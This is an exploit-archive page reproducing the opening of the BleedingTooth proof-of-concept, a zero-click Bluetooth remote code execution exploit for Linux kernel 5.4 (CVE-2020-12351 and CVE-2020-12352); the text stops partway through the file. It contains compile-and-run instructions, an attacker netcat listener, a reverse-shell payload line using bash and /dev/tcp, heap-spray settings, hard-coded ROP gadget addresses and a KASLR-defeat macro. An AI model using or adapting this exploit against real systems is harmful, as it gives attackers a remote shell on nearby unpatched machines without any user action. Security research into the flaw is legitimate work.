Linux Kernel 5.4 BleedingTooth Remote Code Execution

Linux kernel version 5.4 BleedingTooth Bluetooth zero-click proof-of-concept remote code execution exploit.


MD5 | 11e39065cefe8b6ef7461c14faa79210

/*
* BleedingTooth: Linux Bluetooth Zero-Click Remote Code Execution
* by Andy Nguyen ([email protected])
*
* This Proof-Of-Concept demonstrates the exploitation of
* CVE-2020-12351 and CVE-2020-12352.
*
* Compile using:
* $ gcc -o exploit exploit.c -lbluetooth
*
* and execute as:
* $ sudo ./exploit target_mac source_ip source_port
*
* In another terminal, run:
* $ nc -lvp 1337
* exec bash -i 2>&0 1>&0
*
* If successful, a calc can be spawned with:
* export XAUTHORITY=/run/user/1000/gdm/Xauthority
* export DISPLAY=:0
* gnome-calculator
*
* This Proof-Of-Concept has been tested against a Dell XPS 15 running
* Ubuntu 20.04.1 LTS with:
* - 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020
* x86_64 x86_64 x86_64 GNU/Linux
*
* The success rate of the exploit is estimated at 80%.
*/

#include <bluetooth/bluetooth.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>
#include <bluetooth/l2cap.h>
#include <errno.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

// Command run on the target once code execution is reached. The two "%s"
// are filled from the source_ip / source_port command-line arguments named in
// the usage header above. From a defender's side, a bash process whose
// command line contains "/dev/tcp/" is the host-visible artifact of this
// payload and is a cheap place to alert on.
#define REMOTE_COMMAND "/bin/bash -c /bin/bash</dev/tcp/%s/%s"

// Heap-spray tuning knobs; the suffix presumably names the kmalloc size class
// being sprayed (not verifiable from this excerpt).
// Increase if the heap spray is not reliable.
#define NUM_SPRAY_KMALLOC_1024 6
#define NUM_SPRAY_KMALLOC_128 6

// Pacing delay between outgoing HCI ACL packets; the name suggests
// microseconds — confirm against the usleep()/select() call that uses it.
// Increase if stuck at sending packets.
#define HCI_SEND_ACL_DATA_WAIT_USEC 5000

// Presumably the un-randomized x86_64 kernel text base; the per-kernel block
// below computes the KASLR slide relative to this value — TODO confirm.
#define KERNEL_TEXT_BASE 0xffffffff81000000

// Selects the hard-coded per-kernel address set that follows. Exactly one
// such KERNEL_* macro must be defined, otherwise the #else branch below
// stops the build with "No kernel version defined".
#define KERNEL_UBUNTU_5_4_0_48 1
#ifdef KERNEL_UBUNTU_5_4_0_48
#define PUSH_RSI_ADD_BYTE_PTR_RBX_41_BL_POP_RSP_POP_RBP_RET 0xffffffff81567f46
#define POP_RAX_RET 0xffffffff8103d0b1
#define POP_RDI_RET 0xffffffff8108efa0
#define JMP_RAX 0xffffffff8100005b
#define RUN_CMD 0xffffffff810ce470
#define DO_TASK_DEAD 0xffffffff810dc260

#define KASLR_DEFEAT(kaslr_offset, kernel_addr) \
do { \
if ((kernel_addr & 0xfffff) == 0xf4d8e) \
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xf4d8e; \
else \
kaslr_offset = kernel_addr - KERNEL_TEXT_BASE - 0xc001a4; \
} while (0)
#else
#error "No kernel version defined"